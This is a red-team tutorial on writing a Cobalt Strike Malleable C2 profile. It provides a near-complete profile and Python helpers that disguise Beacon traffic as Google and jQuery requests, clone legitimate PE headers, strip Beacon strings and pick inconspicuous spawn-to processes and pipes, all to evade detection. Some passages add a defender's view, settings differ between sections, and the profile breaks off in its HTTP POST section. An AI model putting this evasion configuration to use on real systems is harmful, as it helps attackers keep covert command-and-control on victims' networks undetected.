
Create a Malleable C2 Profile for Cobalt Strike


The “Malleable C2” feature in Cobalt Strike lets you customize the indicators of compromise (IOCs) your Beacon implants generate: the network traffic patterns, and also in-memory and process indicators such as the staged DLL's headers and the post-exploitation spawn-to process. Shaping the traffic so it resembles normal traffic for the environment makes the activity harder for defenders to detect.

You can find many preconfigured profiles on the web, e.g. on GitHub here. It is always recommended to avoid using default or well-known profiles from the internet as-is, since their indicators are already in detection rules. For now, we will download one of the profiles from the GitHub repository above and modify it to our own needs. The changes below modify the jquery-c2.3.11.profile profile.

First, set the sample_name option to the name you want to appear in report titles. Usually this is the client's company name, e.g. Neehack, Inc. Note that every set statement in a profile ends with a semicolon:

set sample_name "Neehack, Inc";

The sleeptime option sets how long Beacon sleeps between calls home to the C2, in milliseconds. The jitter option is a percentage (0 to 99) by which that sleep is randomly varied, so check-ins do not arrive at a fixed interval. For an ordinary engagement, a sleep of at least one minute together with a healthy jitter is recommended.

set sleeptime "60000"; # Call home about once a minute
set jitter    "43";    # Vary the sleep by up to 43%
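As an added example (Python, not from the original post or from Cobalt Strike), the following shows what the sleeptime/jitter pair above means on the wire: the range of gaps a profile allows, a simulation of them, and the defender's view, recovering the approximate sleeptime and jitter from the check-in times in a proxy log. It assumes jitter only shortens the sleep, which is how Beacon's `sleep <seconds> <jitter>` is generally understood but is not stated on this page; the log lines are constructed, not real traffic.

```python
from __future__ import annotations
import random
from datetime import datetime


def interval_bounds(sleeptime_ms: int, jitter_pct: int) -> tuple[int, int]:
    """Shortest and longest gap between check-ins the profile allows."""
    if not 0 <= jitter_pct <= 99:
        raise ValueError("jitter must be a percentage from 0 to 99")
    return sleeptime_ms * (100 - jitter_pct) // 100, sleeptime_ms


def jittered_intervals(sleeptime_ms: int, jitter_pct: int, n: int, seed: int = 7) -> list[int]:
    """Simulate n check-in gaps in ms.  Assumption (not stated on the page):
    jitter only shortens the sleep, so each gap is sleeptime minus a random
    0..jitter% share of it."""
    rng = random.Random(seed)
    return [int(sleeptime_ms - sleeptime_ms * jitter_pct * rng.random() / 100)
            for _ in range(n)]


# Constructed proxy-log lines for one host hitting the profile's GET URI; not real traffic.
SAMPLE_LOG = [
    "2024-01-11T11:38:11Z GET /default.html",
    "2024-01-11T11:39:05Z GET /default.html",
    "2024-01-11T11:39:47Z GET /default.html",
    "2024-01-11T11:40:42Z GET /default.html",
]


def gaps_from_log(lines: list[str]) -> list[int]:
    """Defender side: turn '<ISO-8601 time> <request>' lines into ms gaps."""
    stamps = sorted(datetime.fromisoformat(line.split()[0].replace("Z", "+00:00"))
                    for line in lines)
    return [int((b - a).total_seconds() * 1000) for a, b in zip(stamps, stamps[1:])]


def estimate_profile(gaps_ms: list[int]) -> tuple[int, int]:
    """Recover approximate sleeptime and jitter from observed gaps: the longest
    gap approaches sleeptime, the shortest approaches sleeptime * (1 - jitter)."""
    longest, shortest = max(gaps_ms), min(gaps_ms)
    return longest, round(100 * (1 - shortest / longest))


if __name__ == "__main__":
    print(interval_bounds(60000, 43))
    print(estimate_profile(jittered_intervals(60000, 43, 500)))
    print(estimate_profile(gaps_from_log(SAMPLE_LOG)))
```

The point of the estimator is the opposite of what the profile author wants: with enough check-ins, the longest observed gap gives away sleeptime and the shortest gives away jitter, so a larger jitter widens the band a defender has to model but does not hide the periodicity.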

The next option is the default useragent for Beacon's HTTP requests. You can set it to anything you please, but use a current user-agent string of a common browser that actually shows up in the target's egress traffic; an outdated or unusual user agent stands out in proxy logs.

The spawnto options set the temporary process Beacon spawns, and injects into, to run post-exploitation jobs such as mimikatz or screenshot. Choosing it well is about blending in with normal process activity on the host rather than with network traffic. The values in the downloaded profile are reasonable, but the top-level spawnto_x86/spawnto_x64 syntax is deprecated; in Cobalt Strike 4.x they live in a post-ex block. Keep in mind that svchost.exe is normally started only by services.exe, so an svchost.exe whose parent is, say, a user's browser is a common EDR and hunting query; pick a spawnto that fits the process you are living in. The new syntax is below:

post-ex {
    set spawnto_x86 "%windir%\\syswow64\\svchost.exe -k netsvcs";
    set spawnto_x64 "%windir%\\sysnative\\svchost.exe -k netsvcs";
}

pipename sets the named pipe the SMB Beacon listens on for peer-to-peer traffic, and pipename_stager the pipe the SMB stager uses to hand the stage to it. If you change them, keep the full pipe name under 256 characters and avoid backslashes, the one character Windows does not allow in a pipe name (see Microsoft's named-pipe documentation). Beacon does not check for collisions, so do not reuse a pipe name an existing service already owns.

The dns_idle option sets the IP address the DNS Beacon returns in A-record replies to signal that it is idle. The default value is 0.0.0.0, and this is an indicator some defenders use to zero in on Cobalt Strike's DNS Beacon, so set this option in every profile, to an address that looks plausible for the domain you are using.

The dns_stager_prepend option prepends text to each chunk of the payload stage delivered to the DNS TXT record stager. E.g. if the TXT record being sent is hello_ahmad, the value of dns_stager_prepend is placed in front of hello_ahmad on delivery.

The top-level DNS options are also deprecated; in Cobalt Strike 4.x they move into a dns-beacon block:

dns-beacon {
    set maxdns          "255";
    set dns_max_txt     "252";
    set dns_idle        "0.0.0.0"; # default; change this to an address that looks plausible for your campaign
    set dns_sleep       "0"; #    Force a sleep prior to each individual DNS request. (in milliseconds)
    set dns_stager_prepend ".default.dns.123456.";
    set dns_stager_subhost ".default.dns.123456.";
}

The http-stager block configures the stager, the small payload responsible for downloading the full stage (Beacon) over HTTP.

uri_x86 and uri_x64 are the URIs the x86 and x64 stagers request. Make the stager exchange look like an ordinary page fetch: if the URIs are index.html, set the server output's prepend and append to the contents of a real HTML page so the stage is wrapped in HTML. Note that the stager block does not support the data transforms (mask, base64url) used elsewhere in the profile; only prepend, append and print are available here.

http-stager {
    set uri_x86 "/page1.html";
    set uri_x64 "/page2.html";

    server {
        header "Cache-Control" "max-age=0, no-cache";
        header "Pragma" "no-cache";
        header "Connection" "keep-alive";
        header "Content-Type" "text/html; charset=utf-8";
        output {
            ## The HTML below is a profile string: double quotes and backslashes inside it must be escaped (refer to Tips for Profile Parameter Values)
            prepend "<!doctype html><html itemscope=\"\" itemtype='http://schema.org/WebPage' lang='en-CA'><head><meta charset='UTF-8'><meta content='dark light' name='color-scheme'><meta content='origin' name='referrer'><meta content='";
            append "'http-equiv=\"origin-trial\"><meta content=\"Au/rO0LZ4O4v4w/X5EVviSE5R8rYeBZLlFQ/bnO7UvokjKTjbgbg6arj/oq4lRJHk7nI/NOlRetOK+siM03uXAsAAABueyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jYTo0NDMiLCJmZWF0dXJlIjoiTG9uZ0FuaW1hdGlvbkZyYW1lVGltaW5nIiwiZXhwaXJ5IjoxNzA5NjgzMTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=\" http-equiv=\"origin-trial\"><meta content=\"/images/branding/googleg/1x/googleg_standard_color_128dp.png\" itemprop=\"image\"><title>Google</title>";
            print;
        }
    }

    client {
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
        header "Accept-Language" "en-US,en;q=0.5";
        header "Host" "www.google.com";
        header "Referer" "https://google.com/";
        header "Accept-Encoding" "gzip, deflate";
    }
}

The Server header is not required, so it is dropped from the server block above.

The Content-Type header is set to “text/html; charset=utf-8” since the request is for an HTML file.

The Host and Referer headers are set to google.com. Be aware that a Host header that does not match the address Beacon actually connects to (or the name on the TLS certificate) is itself an indicator, so this only makes sense if your redirector or CDN really serves that name.

Next is the stage section. This section allows you to configure the actual beacon that is to be downloaded by the stager above.

stage {
    set userwx         "false";
    set stomppe        "true";
    set obfuscate      "true";
    set name           "srvhost.dll";
    set cleanup        "true";

    set checksum       "0";
    set compile_time   "11 Nov 2016 04:08:32";
    set entry_point    "650688";
    set image_size_x86 "4661248";
    set image_size_x64 "4661248";
    set rich_header    "\x3e\x98\xfe\x75\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x73\x81\x03\x26\xfc\xf9\x90\x26\x17\xa4\x93\x27\x79\xf9\x90\x26\x7a\xf9\x91\x26\x83\xfd\x90\x26\x17\xa4\x91\x27\x65\xf9\x90\x26\x17\xa4\x95\x27\x77\xf9\x90\x26\x17\xa4\x94\x27\x6c\xf9\x90\x26\x17\xa4\x9e\x27\x56\xf8\x90\x26\x17\xa4\x6f\x26\x7b\xf9\x90\x26\x17\xa4\x92\x27\x7b\xf9\x90\x26\x52\x69\x63\x68\x7a\xf9\x90\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

    ## WARNING: Module stomping

    transform-x86 { # transform the x86 rDLL stage
        prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend nops
        strrep "ReflectiveLoader" "execute"; # Change this text
        strrep "This program cannot be run in DOS mode" ""; # Remove this text
        strrep "beacon.dll"       ""; # Remove this text
    }
    transform-x64 { # transform the x64 rDLL stage
        prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend nops
        strrep "ReflectiveLoader" "execute"; # Change this text
        strrep "beacon.x64.dll"   ""; # Remove this text
    }

    stringw "jQuery"; # Add string to binary
}

You can also make the stage itself look like a real executable: the checksum, compile_time, entry_point, image_size and rich_header values are copied from a legitimate PE so that Beacon's in-memory headers match it.

As the profile itself warns, these options matter and need to be set carefully (module stomping into a DLL that is too small to hold Beacon, for instance, crashes the process). For now you can leave them as they are and revisit them once you understand each option.
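To obtain values like the ones above from a binary of your own, here is an added Python example (not from the original post, and not peclone) that reads the fields the stage block mirrors straight out of a PE image: TimeDateStamp as compile_time, AddressOfEntryPoint, SizeOfImage, CheckSum and the raw Rich header, and prints them as a stage fragment. It uses only the standard library. The sample PE it builds is constructed in memory to carry the page's values and is not a real binary; on a real DLL run `pe_stage_values(open(path, "rb").read())`.

```python
from __future__ import annotations
import struct
from datetime import datetime, timezone

MACHINES = {0x14C: "x86", 0x8664: "x64"}


def rich_header_bytes(pe: bytes, e_lfanew: int) -> bytes:
    """Locate the Rich header between the DOS stub and the PE header.

    Layout: ("DanS" ^ key), three masked nulls, (compid ^ key, count ^ key)...,
    "Rich", key.  Returns the span from the masked "DanS" up to e_lfanew,
    padding included, which is what the profile's rich_header value carries.
    """
    region = pe[0x40:e_lfanew]
    rich = region.find(b"Rich")
    if rich < 0 or rich + 8 > len(region):
        return b""
    key = struct.unpack_from("<I", region, rich + 4)[0]
    masked_dans = struct.unpack("<I", b"DanS")[0] ^ key
    for off in range(rich - 4, -1, -4):
        if struct.unpack_from("<I", region, off)[0] == masked_dans:
            return region[off:]
    return b""


def pe_stage_values(pe: bytes) -> dict:
    """Read the fields the stage block mirrors out of a PE image (what peclone does)."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE image (missing MZ)")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    machine, _nsections, timestamp = struct.unpack_from("<HHI", pe, coff)
    opt = coff + 20  # IMAGE_OPTIONAL_HEADER follows the 20-byte COFF header
    return {
        "arch": MACHINES.get(machine, f"0x{machine:x}"),
        "compile_time": datetime.fromtimestamp(timestamp, tz=timezone.utc)
        .strftime("%d %b %Y %H:%M:%S"),
        "entry_point": struct.unpack_from("<I", pe, opt + 16)[0],  # AddressOfEntryPoint
        "image_size": struct.unpack_from("<I", pe, opt + 56)[0],   # SizeOfImage
        "checksum": struct.unpack_from("<I", pe, opt + 64)[0],     # CheckSum
        "rich_header": rich_header_bytes(pe, e_lfanew),
    }


def c2_escape(raw: bytes) -> str:
    """Render bytes as the \\xNN escapes a profile string expects."""
    return "".join(f"\\x{b:02x}" for b in raw)


def stage_block(v: dict) -> str:
    """Emit a stage fragment for the architecture the binary was built for."""
    return "\n".join([
        "stage {",
        f'    set checksum       "{v["checksum"]}";',
        f'    set compile_time   "{v["compile_time"]}";',
        f'    set entry_point    "{v["entry_point"]}";',
        f'    set image_size_{v["arch"]} "{v["image_size"]}";',
        f'    set rich_header    "{c2_escape(v["rich_header"])}";',
        "}",
    ])


def build_sample_pe() -> bytes:
    """Constructed minimal PE32+ image carrying the page's header values.
    It is not a real binary: no sections, no code, just the headers."""
    key = b"\x7a\xf9\x90\x26"                       # Rich XOR key from the page's value

    def masked(word: bytes) -> bytes:
        return bytes(a ^ b for a, b in zip(word, key))

    rich = (masked(b"DanS") + key * 3                # "DanS" and three masked nulls
            + masked(b"\x01\x00\x01\x00") + masked(b"\x05\x00\x00\x00")  # one compid/count pair
            + b"Rich" + key)
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)         # e_lfanew
    stub = bytes(16) + rich + bytes(0x80 - 0x50 - len(rich))
    ts = int(datetime(2016, 11, 11, 4, 8, 32, tzinfo=timezone.utc).timestamp())
    coff = struct.pack("<HHIIIHH", 0x8664, 0, ts, 0, 0, 240, 0x2022)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)           # PE32+ magic
    struct.pack_into("<I", opt, 16, 650688)         # AddressOfEntryPoint
    struct.pack_into("<I", opt, 56, 4661248)        # SizeOfImage
    struct.pack_into("<I", opt, 64, 0)              # CheckSum
    return bytes(dos) + stub + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    print(stage_block(pe_stage_values(build_sample_pe())))
```

The first four bytes of the page's rich_header value, \x3e\x98\xfe\x75, are "DanS" XORed with the key \x7a\xf9\x90\x26 that follows the trailing "Rich" marker, which is how the extractor finds the start of the header. Take the values from a binary of the same architecture as the Beacon you are building, and check the result with c2lint before deploying it.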

The next section is http-get, which Beacon uses to poll the team server for tasks. It can be set up much like the stager section above, but there are a few options to pay attention to:

  1. mask XORs the data with a random key, so the encoded content differs on every request.
  2. base64url base64-encodes the data with a URL-safe alphabet so it survives in a header, cookie or query string without breaking the request.
  3. Make sure the http-get and http-post URIs are different; the profile's two URIs must be unique.

Next is the http-post section, which configures the request Beacon uses to send output back to the team server. It could be copied from http-get, but it is highly recommended to make it look like a genuine HTTP POST:

http-post {
    set uri "/api/a=pkd181&id=2024";
    set verb "POST";

    client {
        header "Accept" "text/plain, charset=UTF-8";
        header "Host" "www.google.com";
        header "Referer" "https://google.com/";
        header "Accept-Encoding" "gzip, deflate";
        header "Cookie" "GPz4kWUxllTfJ2zBbVQ9UA1G4IrmpXPgGPz4kWUxllTfJ2zBbVQ9UA1G4IrmpXPgGPz4kWUxllTfJ2zBbVQ9UA1G4IrmpXPg;";
        id {
            mask;
            base64url;
            parameter "__cqUb5";
        }

        output {
            mask;
            base64url;
            print;
        }
    }

    server {
        header "Cache-Control" "max-age=0, no-cache";
        header "Pragma" "no-cache";
        header "Connection" "keep-alive";
        header "Content-Type" "text/plain; charset=utf-8";

        output {
            mask;
            base64url;
            prepend "id=218&render=True&action=post&contents=";
            append "&length=2991&value=active&submit=true";
            print;
        }
    }
}

  1. The Accept header is changed to “text/plain, charset=UTF-8” to match the text/plain response the server block returns
  2. A new static Cookie header is added, while the session id travels in the __cqUb5 query parameter
  3. The prepend and append options wrap the server's response body so it reads like form-encoded data
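The transform chains in the http-get and http-post blocks (mask, base64url, prepend/append, and the Cookie and parameter placement) as an added Python example, not code from the original post or from Cobalt Strike. It implements both directions, so you can see what a request or response looks like after the profile is applied and how the receiving side peels it back. Assumptions: the page only says mask “XORs with a random key”; this example uses a 4-byte key placed in front of the data and keeps standard base64 padding, neither of which the page specifies. The literals are the ones from the http-get and http-post blocks above, with a leading & on the append so the response stays a valid form string.

```python
from __future__ import annotations
import base64
import os


def mask(data: bytes, key: bytes | None = None) -> bytes:
    """'mask': XOR the data with a random 4-byte key and put the key first.

    Assumption: the page only says 'XOR with a random key'; the 4-byte,
    key-first layout is this example's reading of it."""
    key = key or os.urandom(4)
    if len(key) != 4:
        raise ValueError("mask key must be 4 bytes")
    return key + bytes(b ^ key[i % 4] for i, b in enumerate(data))


def unmask(blob: bytes) -> bytes:
    """Inverse of mask: the first 4 bytes are the key, the rest is XORed data."""
    key, body = blob[:4], blob[4:]
    return bytes(b ^ key[i % 4] for i, b in enumerate(body))


# Literal values taken from the page's http-get and http-post blocks.
GET_COOKIE_PREFIX = "__cfduid="
POST_ID_PARAM = "__cqUb5"
POST_PREPEND = b"id=218&render=True&action=post&contents="
POST_APPEND = b"&length=2991&value=active&submit=true"


def get_metadata_cookie(metadata: bytes) -> str:
    """http-get client metadata block: base64url; prepend "__cfduid="; header "Cookie"."""
    return GET_COOKIE_PREFIX + base64.urlsafe_b64encode(metadata).decode()


def post_id_query(session_id: bytes, key: bytes | None = None) -> str:
    """http-post client id block: mask; base64url; parameter "__cqUb5"."""
    return POST_ID_PARAM + "=" + base64.urlsafe_b64encode(mask(session_id, key)).decode()


def post_server_body(tasking: bytes, key: bytes | None = None) -> bytes:
    """http-post server output block: mask; base64url; prepend; append; print."""
    return POST_PREPEND + base64.urlsafe_b64encode(mask(tasking, key)) + POST_APPEND


def parse_post_server_body(body: bytes) -> bytes:
    """Inverse of post_server_body: strip the decoration, then undo the
    transforms in reverse order (base64url first, then mask)."""
    if not (body.startswith(POST_PREPEND) and body.endswith(POST_APPEND)):
        raise ValueError("body does not carry the profile's prepend/append")
    inner = body[len(POST_PREPEND):len(body) - len(POST_APPEND)]
    return unmask(base64.urlsafe_b64decode(inner))


if __name__ == "__main__":
    print(get_metadata_cookie(b"metadata"))
    print(post_id_query(b"\x00\x00\x04\xd2"))
    body = post_server_body(b"sleep 60 43")
    print(body)
    print(parse_post_server_body(body))
```

Because the mask key is fresh per message, two identical taskings produce different bodies; only the constant prepend/append and the key-plus-base64url structure are stable, which is exactly why the decorations should be unique to your campaign rather than copied from a public profile.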

Full profile:

# Malleable C2 Profile
# Version: based on the CobaltStrike 3.11 jquery profile, updated to the 4.x post-ex / dns-beacon block syntax
# Description: 
#    c2 profile attempting to mimic a google request
# Modified by: @anawazish


# Original profile: https://github.com/digital-shokunin/malleable-c2/blob/master/jquery-c2.3.14.profile
set sample_name "Neehack, inc";
set sleeptime "60000";        # 1 Minute
set jitter    "28";            # % jitter


set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0"; # Firefox 121.0.1 (64-bit) user agent

################################################
## SSL CERTIFICATE
################################################
## Description:
##    Signed or self-signed TLS/SSL Certifcate used for C2 communication using an HTTPS listener
## Defaults:
##    All certificate values are blank
## Guidelines:
##    - Best Option - Use a certifcate signed by a trusted certificate authority
##    - Ok Option - Create your own self signed certificate
##    - Option - Set self-signed certificate values
https-certificate {
    ## Note: a self-signed certificate claiming CN google.com with O jQuery is itself an easy indicator;
    ## prefer a CA-issued certificate for a domain you actually control
    set C   "US";
    set CN  "google.com";
    set O   "jQuery";
    set OU  "Certificate Authority";
    set validity "365";
}

################################################
## SpawnTo Process
################################################
## Description:
##    Default x86/x64 program to open and inject shellcode into
## Defaults:
##    spawnto_x86: 	%windir%\syswow64\rundll32.exe
##    spawnto_x64: 	%windir%\sysnative\rundll32.exe
## Guidelines
##    - OPSEC WARNING!!!! The spawnto in this example will contain identifiable command line strings
##      - sysnative for x64 and syswow64 for x86
##      - Example x64 : C:\WINDOWS\sysnative\w32tm.exe
##        Example x86 : C:\WINDOWS\syswow64\w32tm.exe
##    - The binary doesn't do anything weird (protected binary, etc.)
##    - !! Don't use these !! 
##    -   "csrss.exe","logoff.exe","rdpinit.exe","bootim.exe","smss.exe","userinit.exe","sppsvc.exe"
##    - A binary that executes without the UAC
##    - 64 bit for x64
##    - 32 bit for x86
post-ex {
    set spawnto_x86 "%windir%\\syswow64\\svchost.exe -k netsvcs";
    set spawnto_x64 "%windir%\\sysnative\\svchost.exe -k netsvcs";
}
################################################
## SMB beacons
################################################
## Description:
##    Peer-to-peer beacon using SMB for communication
## Defaults:
##    pipename: msagent_##
##    pipename_stager: status_##
## Guidelines:
##    - Do not use an existing namedpipe, Beacon doesn't check for conflict!
##    - the ## is replaced with a number unique to a teamserver     
## ---------------------
#set pipename        "wkssvc_##";
#set pipename_stager "spoolss_##";
set pipename         "mojo.5688.8052.18389493978708887701"; # Common Chrome named pipe
set pipename_stager  "mojo.5688.8052.3578027332937047301"; # Common Chrome named pipe

################################################
## DNS beacons
################################################
## Description:
##    Beacon that uses DNS for communication
## Defaults:
##    maxdns: 255
##    dns_idle: 0.0.0.0
##    dns_max_txt: 252
##    dns_sleep: 0
##    dns_stager_prepend: N/A
##    dns_stager_subhost: .stage.123456.
##    dns_ttl: 1
## Guidelines:
##    - DNS beacons generate a lot of DNS requests; they are best used as low-and-slow backup C2 channels
dns-beacon {
    set maxdns          "255";
    set dns_max_txt     "252";
    set dns_idle        "0.0.0.0"; # default; change this to an address that looks plausible for your domain
    set dns_sleep       "0"; #    Force a sleep prior to each individual DNS request. (in milliseconds)
    set dns_stager_prepend ".default.dns.123456.";
    set dns_stager_subhost ".default.dns.123456.";
}

################################################
## Staging process
################################################
## Description:
##    Malleable C2's http-stager block customizes the HTTP staging process
## Defaults:
##    uri_x86 Random String
##    uri_x64 Random String
##    HTTP Server Headers - Basic HTTP Headers
##    HTTP Client Headers - Basic HTTP Headers
## Guidelines:
##    - Add custom HTTP headers to the HTTP traffic of your campaign
##    - Note: the data transform language (mask, base64, base64url, etc.) is not supported in http staging

set host_stage "true"; # Host the payload for staging over HTTP, HTTPS, or DNS. Required by stagers; set to "false" when you only use stageless payloads, since anyone who requests the stager URI can otherwise download the stage and extract the Beacon configuration from it.

http-stager {  
    set uri_x86 "/page1.html";
    set uri_x64 "/page2.html";

    server {
        header "Cache-Control" "max-age=0, no-cache";
        header "Pragma" "no-cache";
        header "Connection" "keep-alive";
        header "Content-Type" "text/html; charset=utf-8";
        output {
            prepend "<!doctype html><html itemscope=\"\" itemtype='http://schema.org/WebPage' lang='en-CA'><head><meta charset='UTF-8'><meta content='dark light' name='color-scheme'><meta content='origin' name='referrer'><meta content=";
            append "'http-equiv=\"origin-trial\"><meta content=\"Au/rO0LZ4O4v4w/X5EVviSE5R8rYeBZLlFQ/bnO7UvokjKTjbgbg6arj/oq4lRJHk7nI/NOlRetOK+siM03uXAsAAABueyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jYTo0NDMiLCJmZWF0dXJlIjoiTG9uZ0FuaW1hdGlvbkZyYW1lVGltaW5nIiwiZXhwaXJ5IjoxNzA5NjgzMTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=\" http-equiv=\"origin-trial\"><meta content=\"/images/branding/googleg/1x/googleg_standard_color_128dp.png\" itemprop=\"image\"><title>Google</title>";
            print;
        }
    }

    client {
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
        header "Accept-Language" "en-US,en;q=0.5";
        header "Host" "www.google.com";
        header "Referer" "https://google.com/";
        header "Accept-Encoding" "gzip, deflate";
    }
}

################################################
## Memory Indicators
################################################
## Description:
##    The stage block in Malleable C2 profiles controls how Beacon is loaded into memory and edits the content of the Beacon DLL.
## Values:
##    checksum      	0	The CheckSum value in Beacon's PE header
##    cleanup           false	Ask Beacon to attempt to free memory associated with the Reflective DLL package that initialized it.
##    compile_time	    14 July 2009 8:14:00	The build time in Beacon's PE header
##    entry_point	    92145	The EntryPoint value in Beacon's PE header
##    image_size_x64	512000	SizeOfImage value in x64 Beacon's PE header
##    image_size_x86	512000	SizeOfImage value in x86 Beacon's PE header
##    module_x64	    xpsservices.dll	Same as module_x86; affects x64 loader
##    module_x86	    xpsservices.dll	Ask the x86 ReflectiveLoader to load the specified library and overwrite its space instead of allocating memory with VirtualAlloc.
##    name	            beacon.x64.dll	The Exported name of the Beacon DLL
##    obfuscate	        false	Obfuscate the Reflective DLL's import table, overwrite unused header content, and ask ReflectiveLoader to copy Beacon to new memory without its DLL headers.
##    rich_header		Meta-information inserted by the compiler
##    stomppe	        true	Ask ReflectiveLoader to stomp MZ, PE, and e_lfanew values after it loads Beacon payload
##    userwx	        false	Ask ReflectiveLoader to use or avoid RWX permissions for Beacon DLL in memory
## Guidelines:
##    - Modify the indicators to minimize in memory indicators
##    - Refer to
##       https://blog.cobaltstrike.com/2018/02/08/in-memory-evasion/
stage {
    set userwx         "false"; 
    set stomppe        "true";
    set obfuscate      "true";
    set name           "srv.dll";
    set cleanup        "true";

    # Values captured using peclone against a Windows 10 version of explorer.exe
    set checksum       "0";
    set compile_time   "11 Jan 2024 11:38:11";
    set entry_point    "650688";
    set image_size_x86 "4661248";
    set image_size_x64 "4661248";
    set rich_header    "\x3e\x98\xfe\x75\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x73\x81\x03\x26\xfc\xf9\x90\x26\x17\xa4\x93\x27\x79\xf9\x90\x26\x7a\xf9\x91\x26\x83\xfd\x90\x26\x17\xa4\x91\x27\x65\xf9\x90\x26\x17\xa4\x95\x27\x77\xf9\x90\x26\x17\xa4\x94\x27\x6c\xf9\x90\x26\x17\xa4\x9e\x27\x56\xf8\x90\x26\x17\xa4\x6f\x26\x7b\xf9\x90\x26\x17\xa4\x92\x27\x7b\xf9\x90\x26\x52\x69\x63\x68\x7a\xf9\x90\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

    ## WARNING: Module stomping 
    # Cobalt Strike 3.11 also adds module stomping to Beacon's Reflective Loader. When enabled, Beacon's loader will shun VirtualAlloc and instead load a DLL into the current process and overwrite its memory.
    # Set module_x86 to a favorite x86 DLL to module stomp with the x86 Beacon. The module_x64 option enables this for the x64 Beacon.
    # While this is a powerful feature, caveats apply! If the library you load is not large enough to host Beacon, you will crash Beacon's process. If the current process loads the same library later (for whatever reason), you will crash Beacon's process. Choose carefully.
    # By default, Beacon's loader allocates memory with VirtualAlloc. Module stomping is an alternative to this. Set module_x86 to a DLL that is about twice as large as the Beacon payload itself. Beacon's x86 loader will load the specified DLL, find its location in memory, and overwrite it. This is a way to situate Beacon in memory that Windows associates with a file on disk. It's important that the DLL you choose is not needed by the applications you intend to reside in. The module_x64 option is the same story, but it affects the x64 Beacon.
    # Details can be found in the In-memory Evasion video series. https://youtu.be/uWVH9l2GMw4

    # set module_x64 "netshell.dll";
    # set module_x86 "netshell.dll";

    # The transform-x86 and transform-x64 blocks pad and transform Beacon's Reflective DLL stage. These blocks support three commands: prepend, append, and strrep.
    transform-x86 { # transform the x86 rDLL stage
        prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend nops
        strrep "ReflectiveLoader" "execute"; # Change this text
        strrep "This program cannot be run in DOS mode" ""; # Remove this text
        strrep "beacon.dll"       ""; # Remove this text
    }
    transform-x64 { # transform the x64 rDLL stage
        prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend nops
        strrep "ReflectiveLoader" "execute"; # Change this text
        strrep "beacon.x64.dll"   ""; # Remove this text
    }

    stringw "jQuery"; # Add string to binary
}

################################################
## HTTP GET
################################################
## Description:
##    GET is used to poll teamserver for tasks
## Defaults:
##    uri "/activity"
##    Headers (Sample)
##      Accept: */*
##      Cookie: CN7uVizbjdUdzNShKoHQc1HdhBsB0XMCbWJGIRF27eYLDqc9Tnb220an8ZgFcFMXLARTWEGgsvWsAYe+bsf67HyISXgvTUpVJRSZeRYkhOTgr31/5xHiittfuu1QwcKdXopIE+yP8QmpyRq3DgsRB45PFEGcidrQn3/aK0MnXoM=
##      User-Agent Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1)
## Guidelines:
##    - Add customize HTTP headers to the HTTP traffic of your campaign
##    - Analyze sample HTTP traffic to use as a reference
http-get {

    set uri "/default.html";
    set verb "GET";

    client {

        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
        header "Host" "www.google.com";
        header "Referer" "https://google.com/";
        header "Accept-Encoding" "gzip, deflate";

        metadata {
            base64url;
            prepend "__cfduid=";
            header "Cookie";
        }
    }

    server {

        header "Cache-Control" "max-age=0, no-cache";
        header "Pragma" "no-cache";
        header "Connection" "keep-alive";
        header "Content-Type" "text/html; charset=utf-8";

        output {
            mask;
            base64url;
            ## The fake Google HTML below wraps the encoded output inside a quoted <meta content="..."> attribute.
            ## Double quotes and backslashes are escaped so the profile parses (Refer to Tips for Profile Parameter Values)
            prepend "<!doctype html><html itemscope=\"\" itemtype=\"http://schema.org/WebPage\" lang=\"en-CA\"><head><meta charset=\"UTF-8\"><meta content=\"dark light\" name=\"color-scheme\"><meta content=\"origin\" name=\"referrer\"><meta content=\"";
            append  "\" http-equiv=\"origin-trial\"><meta content=\"Au/rO0LZ4O4v4w/X5EVviSE5R8rYeBZLlFQ/bnO7UvokjKTjbgbg6arj/oq4lRJHk7nI/NOlRetOK+siM03uXAsAAABueyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jYTo0NDMiLCJmZWF0dXJlIjoiTG9uZ0FuaW1hdGlvbkZyYW1lVGltaW5nIiwiZXhwaXJ5IjoxNzA5NjgzMTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=\" http-equiv=\"origin-trial\"><meta content=\"/images/branding/googleg/1x/googleg_standard_color_128dp.png\" itemprop=\"image\"><title>Google</title>";
            print;
        }
    }
}

################################################
## HTTP POST
################################################
## Description:
##    POST is used to send output to the teamserver
##    Can use HTTP GET or POST to send data
##    Note on using GET: Beacon will automatically chunk its responses (and use multiple requests) to fit the constraints of an HTTP GET-only channel.
## Defaults:
##    uri "/activity"
##    Headers (Sample)
##      Accept: */*
